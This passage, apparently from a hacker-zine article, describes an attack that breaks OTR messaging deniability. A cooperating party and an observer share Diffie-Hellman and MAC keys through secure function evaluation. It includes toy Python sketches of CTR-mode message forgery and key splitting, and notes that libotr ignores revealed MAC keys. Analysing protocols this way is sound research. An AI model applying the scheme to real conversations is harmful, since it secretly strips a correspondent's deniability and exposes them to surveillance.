obtain the keys for his input values from A. For every bit b of his input
|
|
values, Bob will obliviously obtain the correct key k_b0 or k_b1 like this:
|
|
|
|
A ---------------- f, r0, r1 --------------> B
|
|
A <------------- z = f(k) XOR rb ----------- B
|
|
A -------- k_b0 XOR k0, k_b1 XOR k1 -------> B
|
|
|
|
B is now able to evaluate the whole circuit. Depending on how A built the
|
|
circuit, the output truth tables could contain real or garbled values.
|
|
Using some simple tricks, we can even split the output between A and B (so
|
|
that A gets some part of the result and B gets another part). More on
that later. Now there are some problems when one party isn't honest.
|
|
Alice for instance could just prepare a malicious circuit that leaks
|
|
information about Bob's secret inputs. There are ways to prevent such
|
|
attacks ("cut and choose", zero knowledge proofs, etc), but we won't
|
|
provide the details here. A more detailed description (along with a
|
|
security proof) can be found in [3].
|
|
|
|
--[ 3 - OTR
|
|
|
|
For those who are not familiar with the OTR protocol, this section might
|
|
provide some help. OTR features a number of cryptographic properties,
|
|
including confidentiality, integrity, forward secrecy and deniability.
|
|
There are two major phases of the protocol: initial key exchange and
|
|
message exchange. The initial key exchange is based on the Diffie-Hellman
|
|
protocol. It is referred to as AKE (Authenticated Key Exchange). To defend
|
|
against active attackers, a public-key signature scheme (DSA in this
|
|
particular case) is used. The DSA master keys have to be exchanged
|
|
beforehand (OTR also offers to authenticate DSA keys using the SMP
|
|
protocol, but that's not interesting in our case).
|
|
|
|
All the cryptographic details are provided in [2]; it's not particularly
|
|
helpful to repeat them here. Keeping in mind that OTR's key exchange is
|
|
based on Diffie-Hellman combined with some symmetric crypto and a signature
|
|
scheme will suffice. After the key-exchange phase, each party will have a
|
|
number of symmetric keys for encryption and authentication. Those are
|
|
derived from the Diffie-Hellman master key by hashing it in various ways
|
|
(encryption and MAC key will obviously be different).
|
|
|
|
The messages are encrypted using AES in CTR mode, and each message is MACed
|
|
using the symmetric key material. That offers us confidentiality and
|
|
integrity. It's important to note that *only* symmetric keys are used for
|
|
the actual payload crypto. The DSA master keys are only used in the initial
|
|
key-exchange phase.
|
|
|
|
The next feature we're going to look at is forward secrecy. Forward secrecy
|
|
means that even if the (DSA) key of a participant is disclosed, past
|
|
conversations cannot be compromised. Forward secrecy in OTR is established
|
|
by the Diffie-Hellman protocol: after a conversation ends, both parties can
|
|
safely wipe the Diffie-Hellman key that they generated. There is no way for
|
|
an attacker (and not even for the conversation partners) to re-compute that
|
|
key afterwards: to do that, one would either need to know the private
|
|
exponent of one party (which is of course also wiped from memory) or one
|
|
would need to derive the key from the public information exchanged between
|
|
both parties, which is infeasible (hopefully; that's what Diffie-Hellman
|
|
relies on in the first place).
|
|
|
|
Having understood how OTR provides forward secrecy, we can move on to
|
|
deniability. During the conversation, both parties can be sure that the
|
|
messages they receive are authentic and not modified by an attacker. It is
|
|
immediately clear that the message authenticity can not be verified without
|
|
the MAC key. If one of the conversation partners wants to convince a third
|
|
party that a message is authentic, this conversation partner implicitly
|
|
proves his knowledge of the MAC key to the third party. But then again, the
|
|
third party can not be sure that the conversation partner didn't fake the
|
|
message (he can do this as he knows the MAC key). This is what we call weak
|
|
deniability [4]. Obviously, OTR offers weak deniability, as message
|
|
authentication is performed using only symmetric primitives. But OTR offers
|
|
even more: In every message, the sending party includes a new
|
|
Diffie-Hellman key exchange proposal. The proposal is also covered by the
|
|
MAC to rule out MITM attacks. So both parties frequently generate new key
|
|
material. And this lets us do a nice trick: as soon as they generate new
|
|
MAC keys they publicly disclose the old MAC keys. The old keys aren't used
|
|
anymore, so this is safe. But as the MAC keys are public, *everybody* could
|
|
create fake messages and compute proper MACs for those. This is what we
|
|
call strong deniability. OTR ships with a toolkit containing software for
|
|
actually forging messages. Depending on how much you already know (only the
|
|
MAC keys, MAC and encryption keys, MAC keys and some message plaintext),
|
|
you can use different tools to forge messages. If you know parts of the
|
|
plaintext and the MAC keys, you can exploit the fact that AES is used in
|
|
CTR mode to directly modify the known parts of the plaintext. If there is
|
|
no known plaintext, the otr_remac tool might be helpful: Every message
|
|
contains a new Diffie-Hellman key exchange proposal in plaintext (but
|
|
covered by the MAC). Now you can simply replace that proposal by one that
|
|
you generated (e.g. using the otr_sesskeys tool) and compute a new MAC for
|
|
the packet. That allows you to easily fake the rest of the conversation:
|
|
You know your own private Diffie-Hellman key, so you can generate a
|
|
plausible set of MAC and encryption keys and just use that one. It will
|
|
look legitimate because the modified packet (containing your key exchange
|
|
data) still has a valid MAC.
|
|
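A rough sketch of the two properties those forgery tools rely on, in plain
Python: CTR mode is malleable under known plaintext, and once the MAC key
is public anyone can authenticate the result. This is generic code, not
the otr_* tools; real OTR derives its keys differently and MACs more
message fields than just the raw ciphertext:

import hashlib, hmac, secrets

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Setup: what happened during the real conversation. The forger never sees
# the keystream, only the ciphertext that went over the wire.
keystream = secrets.token_bytes(32)            # stands in for AES-CTR output
wire_ct   = xor(keystream, b"meet me at 9pm")

# The forger's view: the recorded ciphertext, a known (or guessed) plaintext
# and the MAC key that was published once it was no longer in use.
known_pt          = b"meet me at 9pm"
disclosed_mac_key = b"an old, publicly disclosed MAC key"

# CTR is a stream cipher: ct XOR known_pt recovers the keystream bytes, and
# XORing in a fake plaintext of the same length gives a new ciphertext.
fake_pt   = b"meet me at 8am"
forged_ct = xor(xor(wire_ct, known_pt), fake_pt)

# Anyone holding the disclosed MAC key can authenticate the forgery.
forged_tag = hmac.new(disclosed_mac_key, forged_ct, hashlib.sha1).digest()

assert xor(forged_ct, keystream) == fake_pt    # decrypts to the fake message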
|
|
--[ 4 - The Attack
|
|
|
|
The deniability of OTR stems from the fact that a third party does not know
|
|
whether a message has been sent during a conversation (and before the MAC
|
|
keys were disclosed) or was generated afterwards (when the MAC keys were
|
|
public). An obvious way to attack OTR's deniability would therefore be to
|
|
just monitor all the OTR traffic between A and B. If one party now decides
|
|
to disclose the MAC and encryption keys used for a particular message, the
|
|
authenticity of that message can be verified. And as the message has been
|
|
recorded during the conversation (i.e. before the MAC keys were public),
|
|
the recording party knows that it was not generated afterwards.
|
|
|
|
Let's look at a real-life example to shed some more light on what we're
|
|
doing. Imagine two hackers A and B who want to talk about serious stuff
|
|
(TM) using OTR. Both of them are slightly paranoid and don't trust each
|
|
other. In particular, Bob fears that Alice might backstab him. However, as
|
|
OTR is deniable, Bob assumes that even if Alice discloses the contents of
|
|
their conversation, he could still plausibly argue that Alice just made it
|
|
up to discredit him. So Bob ignores his paranoia and tells Alice his
|
|
secrets. Alice indeed plans to backstab Bob. Her first plan is simple: She
|
|
will just submit all the encrypted and authenticated messages to the
|
|
police. The police will later be able to state in court that Alice didn't
|
|
fake the messages after the conversation. She however quickly realizes that
|
|
this approach is inherently flawed: Bob could argue that Alice just sent
|
|
fake messages to the police (as Alice knows all the keys she could generate
|
|
such fake messages). Alice knows that this problem could be fixed if the
|
|
Police sniffed all the traffic themselves. But she also knows that this is
|
|
going to be difficult, so she comes up with a second idea: Why not use a
|
|
trusted third party?
|
|
|
|
Instead of submitting her messages to the police, she will just disclose
|
|
her private DSA key to her lawyer. Then, during her conversation with Bob,
|
|
she will use her lawyer as a proxy (i.e. she will let *him* do the
|
|
crypto). This way the lawyer can be sure that the conversation is
|
|
authentic. The judges will trust Alice's lawyer in court (at least they'll
|
|
trust him more than they trust Alice), so her problem is solved. Alice's
|
|
setup would look like this:
|
|
|
|
+-------+
|
|
| Alice |
|
|
+-------+
|
|
^
|
|
| Non-OTR (maybe SSL)
|
|
v
|
|
+------------+
|
|
| Lawyer | trust +----------------+
|
|
| Speaks for | <---------> | Police / Court |
|
|
| Alice | +----------------+
|
|
+------------+
|
|
^
|
|
| OTR (Bob thinks he talks to Alice)
|
|
v
|
|
+-------+
|
|
| Bob |
|
|
+-------+
|
|
|
|
But now Alice realizes that she doesn't trust her lawyer enough to give him
|
|
her private DSA key: He could misuse it to impersonate her. Also, Alice
|
|
doubts that her lawyer's words would be trusted enough in court.
|
|
|
|
This example shows the problems that Alice has when she wants to break the
|
|
deniability of OTR. Her problems can be summarized as follows (we'll now
|
|
call the police the "observing party" and the lawyer will be called
|
|
"trusted third party"):
|
|
a) The observing party needs to sniff the network traffic. That implies
|
|
quite a privileged network position, as the traffic needs to be sniffed
|
|
passively, i.e. without the help of A or B. Because if A or B sent
their traffic to the observing party, they might just insert
|
|
bogus messages into their "sniff" stream and the observing party
|
|
couldn't be sure about the authenticity. Even worse, paranoid A and B
|
|
could use an anonymizing network, so that sniffing their traffic would
|
|
be a non-trivial task.
|
|
|
|
b) Also, the authenticity of a message can only be proven to the observing
|
|
party, but not to anybody else (as nobody else sniffed the traffic
|
|
and the observing party could just have cut some pieces or inserted new
|
|
ones).
|
|
|
|
Problem b) is not that important. Just imagine the observing party
|
|
as the police, the judges or even Fnord. You should always assume that the
|
|
observing party is exactly the guys you wanna protect yourself against. If
|
|
you think that the police probably won't even get all the crypto stuff and
|
|
therefore just believe any plaintext logfile you show them, that's OK
|
|
(you're probably right). There might however be agencies that would not
|
|
really trust plaintext logs. And those agencies might be very interested in
|
|
the contents of some OTR conversations.
|
|
|
|
Problem a) remains open. Obviously, neither A nor B really trust the
|
|
observing party. If we had a trusted third party, we actually could mount
|
|
an attack against OTR's deniability, just as described in the lawyer
|
|
example above. Well, lucky us, neither A, nor B, nor the observing party
|
|
trust anybody and therefore, there will be no trusted third party ;)
|
|
|
|
Really? Interestingly, a trusted third party can be emulated using secure
|
|
function evaluation. This is what we didn't mention in the section above: you
|
|
can view a secure function evaluation scheme as a replacement for a trusted
|
|
third party. So instead of letting a third party compute some function
|
|
f(x, y), A and B can perform the computation on their own and still get the
|
|
same result: both players only receive f(x, y) but A doesn't see y and B
|
|
doesn't see x. So the main idea of our attack is: Emulate a trusted third
|
|
party using secure function evaluation. The setup that Alice now plans is
|
|
the following:
|
|
|
|
+-------+
|
|
| Alice |<-----------+
|
|
+-------+ |
|
|
^ |
|
|
| | SFE Voodoo for emulating the lawyer
|
|
| |
|
|
| v
|
|
| +----------------+
|
|
| | Police / Court |
|
|
| +----------------+
|
|
|
|
|
| OTR
|
|
|
|
|
v
|
|
+-------+
|
|
| Bob |
|
|
+-------+
|
|
|
|
Our central idea is the following: A can send all the messages she received
|
|
from B to the observing party (the police in the figure above, but that
|
|
could really be everyone). The messages are still encrypted, so this is not
|
|
a problem. To make sure that the messages are not faked by A, we need to
|
|
make sure that A cannot produce valid MACs without the help of the
|
|
observing party. We therefore share the MAC key between A and the observing
|
|
party. Every time A wants to validate or produce a MAC, she has to
|
|
cooperate with the observing party. Later on, A can reveal the encryption
|
|
key for any message to the observing party, which can be sure that the
|
|
message is authentic.
|
|
|
|
In the following section (4.1 - 4.3), we will provide a high-level overview
|
|
of the attack. In section 4.4, you can find the actual protocol that Alice
|
|
and the observing party use.
|
|
|
|
------[ 4.1 - Sharing Diffie-Hellman Keys
|
|
|
|
OTR uses Diffie-Hellman to establish short-lived MAC and encryption keys.
|
|
The first part of our exercise is therefore to build a Diffie-Hellman
|
|
compatible 3-party protocol that allows for sharing the generated key
|
|
between two parties. The following protocol between Alice (A), Bob (B)
|
|
and the observing party (O) works:
|
|
|
|
O ----- g^o ----> A ---- (g^o)^a ----> B
|
|
O <---- g^a ---- A
|
|
A <--- g^b ---- B
|
|
|
|
All computations are done modulo some prime p and g is a generator of a
|
|
sufficiently large subgroup of Z_p*, just as Diffie-Hellman mandates.
|
|
B will now compute g^oab as key. However, neither A nor O can reproduce
|
|
that key. If A wanted to compute it, she would need to know O's secret
|
|
exponent o; similarly, O would need a. We can therefore say that the key k is shared
|
|
between O and A, in the sense that A and O need to cooperate in order to
|
|
actually use it.
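
A toy Python sketch of this exchange may help to see who can compute what.
The prime and generator below are arbitrary values picked for readability,
not OTR's real group parameters.

--- snip ---
import random

p, g = 2 ** 127 - 1, 5          # toy parameters, NOT OTR's real group
o = random.randrange(2, p - 1)  # O's secret exponent
a = random.randrange(2, p - 1)  # A's secret exponent
b = random.randrange(2, p - 1)  # B's secret exponent

g_o  = pow(g, o, p)             # O -> A
g_oa = pow(g_o, a, p)           # A -> B  (what Bob sees as "Alice's" key)
g_b  = pow(g, b, p)             # B -> A

k_bob = pow(g_oa, b, p)         # Bob computes g^(oab)

# Neither A (who knows a, g^o, g^b) nor O (who knows o, g^a) can compute
# g^(oab) alone; only by cooperating, e.g. ((g^b)^a)^o, do they get it:
assert pow(pow(g_b, a, p), o, p) == k_bob
--- snap ---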
|
|
|
|
------[ 4.2 - Generating MAC and Encryption Keys
|
|
|
|
Now that we have established a shared Diffie-Hellman key, we need to
|
|
securely derive the MAC and encryption keys from it. Let's assume we have a
|
|
circuit C, which takes the shared Diffie-Hellman key k as input and returns
|
|
the corresponding MAC and encryption keys as output. This circuit follows
|
|
immediately from the OTR specification. Before we can evaluate the circuit,
|
|
we first need to compute k (which neither A nor O know at this time). So
|
|
the overall function that A and O want to compute is:
|
|
|
|
f(a, o) = C(((g^b)^a)^o mod p)
|
|
|
|
We can transform this function to a new circuit and evaluate it together
|
|
(i.e. A and O evaluate the circuit). After the evaluation, A could get the
|
|
encryption keys. But that's not a good idea, because the OTR spec mandates
|
|
that MAC_key = hash(encryption_key). If A knew the encryption key, she
|
|
could compute the according MAC key. Also, it would be bad if O would get
|
|
the MAC keys, because then O could impersonate A and B. Therefore, we'll
|
|
slightly modify the circuit, so that A may pick a random bit string, which
|
|
the circuit XORs to the MAC key and to the encryption key (assuming the
|
|
random string is long enough for both keys). The "blinded" MAC and
|
|
encryption keys are then provided to A and O, the bitmask remains in A's
|
|
memory. If they want to use one of the keys for something, they will
|
|
evaluate a circuit that first XORs both halves together and then does the
|
|
actual computation using the key. At no point in time, A or O actually
|
|
learn the MAC or the encryption key.
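
What the blinding buys us can be sketched as follows. The garbled-circuit
machinery itself is omitted; derive_keys() is only a stand-in for OTR's real
key derivation, and the point is merely that each party's output is useless
on its own.

--- snip ---
import hashlib, os

def derive_keys(k_bytes):
    # stand-in for the circuit C / OTR's key derivation
    ek = hashlib.sha256(b"enc" + k_bytes).digest()[:16]   # encryption key
    mk = hashlib.sha1(ek).digest()                        # MAC key = hash(ek)
    return ek + mk

k = os.urandom(192)        # placeholder for the shared DH secret
mask = os.urandom(36)      # Alice's random bit string (16 + 20 bytes)

keys = derive_keys(k)                                 # computed inside the circuit
share_O = bytes(x ^ y for x, y in zip(keys, mask))    # output handed to O
share_A = mask                                        # stays in Alice's memory

# Each share alone is just random bytes; the real keys only exist when both
# shares are XORed together, which is exactly what the follow-up circuits do
# internally whenever a key is needed.
assert bytes(x ^ y for x, y in zip(share_O, share_A)) == keys
--- snap ---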
|
|
|
|
Now that we know how to generate all the symmetric key material, we are
|
|
able to perform the full initial key exchange phase of OTR.
|
|
|
|
------[ 4.3 - Sending and Receiving Messages
|
|
|
|
When A receives a message from B, she cannot immediately decrypt it because
|
|
she doesn't know the decryption key. Also, verifying and sending messages
|
|
needs O's cooperation.
|
|
|
|
1) Message Decryption
|
|
If A wants to decrypt one of B's messages, she cooperates with O. Both
|
|
parties will jointly evaluate a decryption circuit. The circuit will be
|
|
built in such a way that only Alice will learn the result (i.e. Alice
|
|
will again provide a random bitstring as input to the circuit, which is
|
|
XORed to the result).
|
|
|
|
2) Message Verification
|
|
If A wants to verify one of B's messages, she has to cooperate with O.
|
|
A and O will jointly evaluate some sort of HMAC circuit, in order to
|
|
find out whether a message is authentic or not. We can design the
|
|
message verification function in such a way that O will immediately
|
|
learn the encrypted message and the MAC verification result. This
|
|
enables A to afterwards reveal the encryption key for a particular
|
|
message, so that O will be convinced A didn't fake it.
|
|
|
|
3) Message Creation
|
|
When A wants to create a message, she encrypts it together with O, just
|
|
as described in 1). In order to compute a MAC for the message, A and O
|
|
again cooperate. As each message has to contain a new Diffie-Hellman
|
|
public key, A and O will jointly compute such a key using the scheme
|
|
outlined above.
|
|
|
|
------[ 4.4 - The Final Protocol
|
|
|
|
In this section we'll describe our final protocol. It offers the following
|
|
features:
|
|
* We have three parties: A, B and O. A and O cooperate to backstab B. B is
|
|
not able to deny any of his messages towards O.
|
|
* O will not learn any message plaintext, unless A explicitly tells O the
|
|
respective keys.
|
|
* O is not able to impersonate either A or B.
|
|
* No trust relation between A and O is required.
|
|
* A does not have to disclose a whole conversation to O; it is possible to
|
|
only disclose selected messages.
|
|
* B does not notice that A and O cooperate.
|
|
|
|
---------[ 4.4.1 - Initial Key-Exchange
|
|
|
|
This section describes OTR's authenticated key-exchange (AKE) as it is run in our setting, with the observing party in the loop.
|
|
Bob starts the key exchange by picking a random r and x and sending
|
|
AES_r(g^x), HASH(g^x) to Alice. That's the regular OTR protocol. Alice
|
|
then does a Diffie-Hellman key-exchange with O as outlined in section
|
|
4.1. We assume that A and O communicate over a secure channel.
|
|
|
|
O A <-------- AES_r(g^x), HASH(g^x) ----- B
|
|
O <------- g^a ------------- A
|
|
O -------- g^o ------------> A
|
|
|
|
Now Alice sends her Diffie-Hellman public key to Bob. Note that she doesn't
|
|
know the private exponent of the key: she knows only a and g^ao, but
|
|
neither ao nor o.
|
|
|
|
A ------------------ g^ao ------------> B
|
|
|
|
Bob has already computed the common key k (which Alice can't do) and uses
|
|
it to derive encryption keys c and c' and MAC keys m1, m1', m2, m2' (see
|
|
the OTR specs [2] for details) by hashing k in various ways. Bob builds
|
|
the following messages:
|
|
|
|
M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B)
|
|
X_B = pub_B, keyid_B, sig_B(M_B)
|
|
|
|
Where pub_B is Bob's public DSA key and keyid_B is an identifier for Bob's
|
|
Diffie-Hellman proposal g^x. sig_B is created using Bob's DSA key. Using
|
|
the already derived symmetric keys, he sends AES_c(X_B),MAC_m2(AES_c(X_B))
|
|
over to Alice.
|
|
|
|
A <- r, AES_c(X_B),MAC_m2(AES_c(X_B)) - B
|
|
|
|
Alice is now supposed to also derive all the symmetric keys
|
|
and to use them to decrypt and verify the stuff that Bob sent. But Alice
|
|
cannot do that, so she cooperates with O. O sends her a garbled circuit C1,
|
|
which will compute
|
|
|
|
C1(o, a, mask) = (c, c') XOR mask
|
|
|
|
Alice randomly chooses mask, so only she will learn c and c'. In a number
|
|
of oblivious transfers, Alice receives the keys for her input values from
|
|
O.
|
|
|
|
O --------- C1 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Compute c, c' using SFE. Only A
|
|
. | receives the values.
|
|
. |
|
|
. /
|
|
O <----- eval(C1) ---------- A /
|
|
O --- (c,c') XOR mask -----> A/
|
|
|
|
Now Alice is finally able to decrypt the stuff that Bob sent her. She does
|
|
so and gets X_B. Currently, she is not able to verify the MAC_m2() value
|
|
Bob sent - she'll do that later. First she sends sig_B(M_B) over to O.
|
|
|
|
O <------- sig_B(M_B) ------ A
|
|
|
|
In order to actually verify sig_B(M_B), A and O first need to compute M_B.
|
|
As described above, M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B). In order to
|
|
compute that MAC, both parties again need to cooperate. O creates a circuit
|
|
C2, which computes:
|
|
|
|
C2(o, a, pub_B, keyid_B) = MAC_m1(g^x, g^ao, pub_B, keyid_B)
|
|
|
|
Alice again uses oblivious transfers to obtain the keys for her secret
|
|
input value a, evaluates the circuit and both parties obtain the result
|
|
M_B.
|
|
|
|
O --------- C2 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A |
|
|
O -------- <OT> -------------> A | Compute M_B using SFE. A and O
|
|
. | receive the value.
|
|
. |
|
|
. /
|
|
O <----- eval(C2) ------------ A /
|
|
O -------- M_B --------------> A/
|
|
|
|
Now that both have computed M_B, they first check the signature sig_B(M_B),
|
|
just as the OTR protocol mandates. If A and O are convinced that sig_B(M_B)
|
|
is OK, they can verify the MAC_m2(...) that B sent earlier. Again, they
|
|
perform some SFE voodoo to do that. The observing party prepares a circuit
|
|
C3, which computes:
|
|
|
|
C3(o, a, AES_c(X_B)) = MAC_m2(AES_c(X_B))
|
|
|
|
A again uses oblivious transfers to obtain the keys for her input values
|
|
and the result is shared between both parties.
|
|
|
|
O --------- C3 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A |
|
|
O -------- <OT> -------------> A | Compute MAC_m2(AES_c(X_B)) using
|
|
. | SFE. Both receive the result.
|
|
. |
|
|
. /
|
|
O <----- eval(C3) ------------ A /
|
|
O --------- MAC -------------> A/
|
|
|
|
Now A and O are convinced that the key exchange with B succeeded. But they
|
|
still need to convince B that everything is OK. In particular, OTR mandates
|
|
that A should compute
|
|
|
|
M_A = MAC_m1'(g^ao, g^x, pub_A, keyid_A)
|
|
X_A = pub_A, keyid_A, sig_A(M_A)
|
|
|
|
and then send AES_c'(X_A), MAC_m2'(AES_c'(X_A)) over to B. Computing the
|
|
AES part can be done by A, because A knows the key c'. But for computing
|
|
the MAC, A and O again need to cooperate. First, A sends AES_c'(X_A) over
|
|
to O. Then O prepares a circuit C4, which computes:
|
|
|
|
C4(o, a, AES_c'(X_A)) = MAC_m2'(AES_c'(X_A))
|
|
|
|
Using oblivious transfers, Alice obtains the keys for her inputs from O.
|
|
After evaluating the circuit, A and O obtain MAC_m2'(AES_c'(X_A)).
|
|
|
|
O <----- AES_c'(X_A) -------- A\
|
|
O --------- C4 --------------> A \
|
|
\
|
|
O -------- <OT> -------------> A |
|
|
O <------- <OT> -------------- A | Compute MAC_m2'(AES_c'(X_A)). Both
|
|
O -------- <OT> -------------> A | parties receive the value.
|
|
. |
|
|
. /
|
|
O <----- eval(C4) ------------ A /
|
|
O -- MAC_m2'(AES_c'(X_A)) ---> A/
|
|
|
|
That's it. A can now send all the required values to B.
|
|
|
|
- AES_c'(X_A), MAC_m2'(AES_c'(X_A)) -> B
|
|
|
|
B verifies all the stuff (just like A did but without the SFE) and the
|
|
key exchange is done.
|
|
|
|
---------[ 4.4.2 - Message Exchange
|
|
|
|
Once they have exchanged their initial key material, Alice and Bob can
|
|
exchange actual messages. Suppose Alice wants to send a message to Bob;
|
|
we'll restrict ourselves to that scenario. Receiving messages works
|
|
similarly.
|
|
|
|
Alice now does the following (from the OTR protocol spec [2]):
|
|
Picks the most recent of her own Diffie-Hellman encryption keys that Bob
|
|
has acknowledged receiving (by using it in a Data Message, or failing
|
|
that, in the AKE). Let key_A be that key, and let keyid_A be its serial
|
|
number.
|
|
|
|
If the above key is Alice's most recent key, she generates a new
|
|
Diffie-Hellman key (next_dh), to get the serial number keyid_A+1.
|
|
|
|
To do this, Alice again needs to cooperate with the observing party.
|
|
The steps are exactly the same as we have already seen in the initial
|
|
key-exchange:
|
|
|
|
O <------- g^a -------------- A
|
|
O -------- g^o -------------> A
|
|
|
|
Alice now uses g^ao as next_dh. Once she has computed next_dh, Alice
|
|
picks the most recent of Bob's Diffie-Hellman encryption keys that she has
|
|
received from him (either in a Data Message or in the AKE). Let key_B be
|
|
that key, and let keyid_B be its serial number.
|
|
|
|
Now Alice would actually need to use Diffie-Hellman to compute a fresh
|
|
shared key with Bob, which she can use to derive the encryption and MAC
|
|
key. But as she doesn't really know the private exponent (she knows g^ao,
|
|
a and g^a, but not ao), she again needs to cooperate with O. So here we go:
|
|
|
|
O prepares a circuit C1:
|
|
|
|
C1(o, a, mask) = (ek, mk) XOR mask
|
|
|
|
The circuit will compute both ek and mk (the encryption and MAC keys),
|
|
blinded with some value chosen by Alice. The result will be supplied only
|
|
to the observing party. Alice will keep the value of mask. In a number of
|
|
oblivious transfers, Alice receives the keys for her input values from O.
|
|
|
|
O --------- C1 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Compute (ek, mk) XOR mask using SFE.
|
|
. | Only O receives the result.
|
|
. |
|
|
. /
|
|
O <----- eval(C1) ---------- A /
|
|
|
|
Alice now picks a value ctr, so that (key_A, key_B, ctr) is unique. The
|
|
ctr value is needed, because AES is going to be used in counter mode to
|
|
encrypt Alice's payload. The next step for Alice is to encrypt her message.
|
|
As she doesn't know the encryption key, O prepares a circuit C2 for her:
|
|
|
|
C2(ek_o, ek_a, ctr, msg) = AES-CTR_ek,ctr(msg)
|
|
|
|
The inputs ek_o and ek_a denote O's and A's knowledge about ek, which is
|
|
ek XOR mask in O's case and mask in A's case. The result of the circuit
|
|
will only be provided to A (i.e. A just doesn't send it over to O). In a
|
|
number of oblivious transfers, Alice receives the keys for her input
|
|
values from O.
|
|
|
|
O --------- C2 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Encrypt msg using SFE. Only A
|
|
. | receives the result.
|
|
. /
|
|
. /
|
|
|
|
Now Alice can compute:
|
|
|
|
T_A = (keyid_A, keyid_B, next_dh, ctr, AES-CTR_ek,ctr(msg))
|
|
|
|
T_A already contains Alice's message, but she still needs to MAC it. This
|
|
is again done by A and O together. O prepares a circuit C3:
|
|
|
|
C3(mk_o, mk_a, T_A) = MAC_mk(T_A)
|
|
|
|
O --------- C3 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A | Compute MAC_mk(T_A). Both
|
|
O -------- <OT> -------------> A | parties receive the value.
|
|
. |
|
|
. /
|
|
O <----- eval(C3) ----------- A /
|
|
O ----- MAC_mk(T_A) --------> A/
|
|
|
|
Please be aware that Alice will keep T_A secret. Although T_A doesn't
|
|
contain any plaintext, Alice does not want to disclose it to the observing
|
|
party. If she did, then her own deniability would also be gone.
|
|
Also, the OTR protocol mandates that Alice should send her old MAC keys in
|
|
plaintext to Bob, so that they can be considered public. If A and O wanted
|
|
to, they could do that (by computing the old MAC key again and sharing the
|
|
result). But as long as Bob doesn't check what Alice sent, she can just
|
|
send garbage. Indeed, in its current version (libotr 3.2.0), the OTR
|
|
implementation doesn't check the disclosed MAC keys. Consider the excerpt
|
|
from proto.c, line 657:
|
|
|
|
--- snip ---
|
|
/* Just skip over the revealed MAC keys, which we don't need. They
|
|
* were published for deniability of transcripts. */
|
|
bufp += reveallen; lenp -= reveallen;
|
|
--- snap ---
|
|
|
|
So Alice can safely send:
|
|
|
|
A -T_A,MAC_mk(T_A),oldmackeys=foobar-> B
|
|
|
|
------[ 4.5 - What's Left
|
|
|
|
We have seen that in a scenario where at least one party cooperates with
|
|
the attacker, deniability is non-trivial. Our construction can be extended
|
|
and adapted, and we conjecture that it applies quite generally to deniable
|
|
messaging protocols.
|
|
|
|
Regarding performance: Yeah, we know that all the SFE voodoo can be quite
|
|
expensive. Especially modular exponentiation in circuits is not really
|
|
cheap. However, there are ways to optimize the basic scheme we have
|
|
outlined here. If you're interested in that, you might wanna read [5] as an
|
|
introduction. Also, refer to section 4.5.2, which outlines one particular
|
|
optimization of our Diffie-Hellman-scheme. Regarding network latency: When
|
|
looking at all the crypto protocols outlined in this article (especially at
|
|
oblivious transfers), you will notice that often multiple messages need to
|
|
be exchanged. If you need 3 messages for one oblivious transfer and you
|
|
want to perform 128 oblivious transfers (for some 128-bit crypto key or
|
|
so), then you end up with 384 messages being exchanged. In terms of network
|
|
latency, that might be troublesome. However, there are two things that help
|
|
us: first, we can perform oblivious transfers in parallel (i.e. still
|
|
exchange three messages but every message now contains data for 128
|
|
oblivious transfers). We can also precompute many values and exchange them
|
|
before they are really needed (random values for instance).
|
|
|
|
---------[ 4.5.1 - FAQ
|
|
|
|
Q: This is all bullshit! I could just share my private keys with the
|
|
police, and that would also kill deniability!
|
|
|
|
Yep. And the police would then be able to impersonate you. One of our
|
|
key points is that you don't need to trust the observing party, nor do
they need to trust you.
|
|
|
|
Q: But the observing party won't be able to prove anything in court!
|
|
|
|
Well, yes and no. In a constitutional state you'd need to actually prove
|
|
stuff in court. Unfortunately, such states are rare. But even if you
|
|
live in such a state, then the observing party could be the judge.
|
|
|
|
Q: But all the conversations that I had before my peer cooperated with the
|
|
observing party are deniable, right?
|
|
|
|
A: Yes, unless the observing party sniffed your traffic (if you used a
|
|
decent anonymizer, this is unlikely).
|
|
|
|
Q: Wait, the observing party so far only learned that *somebody* has sent
|
|
a message. But how do they know it was the person that I tell them it
|
|
was?
|
|
|
|
Good question. This knowledge is generated during the initial key
|
|
exchange of OTR. To be precise, the observing party and the backstabber
|
|
both learn the identity of the conversation peer when he signs his
|
|
key-exchange proposal with his DSA key. The observing party also sees
|
|
that, and as they track all subsequent key-exchanges, they can build a
|
|
"chain of evidence".
|
|
|
|
Q: But doesn't [4] already kill the deniability of OTR?
|
|
|
|
A: Ha, even better question! At least it attacks the strong deniability of
|
|
OTR. However, our scheme also attacks the weak deniability. Furthermore,
|
|
the attacker in [4] has far more capabilities than in our model. In [4],
|
|
the attacker is able to arbitrarily read and modify network traffic. In
|
|
our model, the attacker can rely on the cooperation with one of the two
|
|
conversation partners.
|
|
|
|
Q: OK, I'm convinced. Is there any implementation?
|
|
|
|
A: You're welcome to build one ;) See section 4.5.2 for details.
|
|
|
|
---------[ 4.5.2 - How to Implement?
|
|
|
|
If you want to implement the scheme outlined above, first of all, you need
|
|
some framework for secure function evaluation. There are a number of
|
|
implementations out there, for instance Fairplay [6] or TASTY [5]. Once you
|
|
got your SFE framework running, you need to implement all the functions
|
|
that need to be computed jointly. The Diffie-Hellman stuff is probably most
|
|
efficient when implemented using a homomorphic cryptosystem (such as
|
|
RSA or ElGamal maybe). Now you may ask: how does a multiplicatively
|
|
homomorphic scheme help us compute DH keys? Well, there's a nice
|
|
optimization, which basically reduces the modular exponentiation to a
|
|
modular multiplication:
|
|
|
|
Alice picks some random j and sends g^(ab+j) over to the observing party.
|
|
The observing party sends g^o.
|
|
|
|
A <---- g^b ------------ B
|
|
O <------ g^(ab+j) ------ A
|
|
O -------- g^o ---------> A
|
|
|
|
